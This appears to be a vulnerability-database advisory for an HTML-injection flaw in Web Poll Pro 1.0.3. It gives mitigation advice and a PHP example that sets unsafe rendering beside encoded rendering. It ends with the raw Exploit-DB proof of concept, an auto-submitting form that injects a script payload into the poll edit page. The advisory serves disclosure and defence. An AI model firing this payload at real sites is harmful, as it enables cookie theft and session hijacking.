Vendor: Web Poll Pro
By: Unknown
CVSS: 7.5 (HIGH)
Type: HTML-injection
CWE: 79
Product Name: Web Poll Pro
Affected Version From: 1.0.3
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:web_poll_pro:web_poll_pro:1.0.3
Metasploit:
Other Scripts:
Platforms Tested: Unknown

HTML-injection vulnerability in Web Poll Pro

The Web Poll Pro application is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can lead to the theft of cookie-based authentication credentials, control over how the site is rendered to the user, or other attacks.

Mitigation:

To mitigate this vulnerability, sanitize all user-supplied input before using it in dynamic HTML content. Implement input validation and encoding to prevent HTML-injection attacks.
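
The mitigation above, shown as the weak rendering pattern beside the corrected one. This is an added example, not Web Poll Pro source code: the function names are hypothetical, and it assumes the edit page writes the POSTed "error" field into a quoted HTML attribute and that "poll" is a numeric id.

```php
<?php
// Added illustration, not Web Poll Pro source. Function names are hypothetical.
// Assumption: the edit page writes the POSTed "error" value into a quoted
// HTML attribute and "poll" is a numeric poll id.
declare(strict_types=1);

/** Encode untrusted text for HTML body text or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Weak pattern: raw concatenation lets "> end the attribute and open a tag. */
function render_error_unsafe(string $error): string
{
    return '<input type="text" name="error" value="' . $error . '">';
}

/** Corrected pattern: encode at the point of output. */
function render_error_safe(string $error): string
{
    return '<input type="text" name="error" value="' . h($error) . '">';
}

/** Allow-list validation: a poll id must be a positive integer. */
function parse_poll_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Value of the "error" field as given in the proof of concept on this page.
$error = 'description"><script>alert(document.cookie)</script>';

echo render_error_unsafe($error), PHP_EOL; // weak rendering, for comparison
echo render_error_safe($error), PHP_EOL;   // encoded rendering
var_dump(parse_poll_id('1'));              // well-formed id
var_dump(parse_poll_id('1"><b>'));         // malformed id
```

Encoding belongs at the point of output, in addition to validating input on the way in, so that values already stored by the application are also rendered safely.
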
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46932/info

Web Poll Pro is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.

Web Poll Pro 1.0.3 is vulnerable; other versions may also be affected. 

<form action="http://host/poll/poll.php&page=edit" method="post" name="main">
<input type="hidden" name="poll" value="1">
<input type="hidden" name="error" value=&#039;description"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.main.submit();
</script>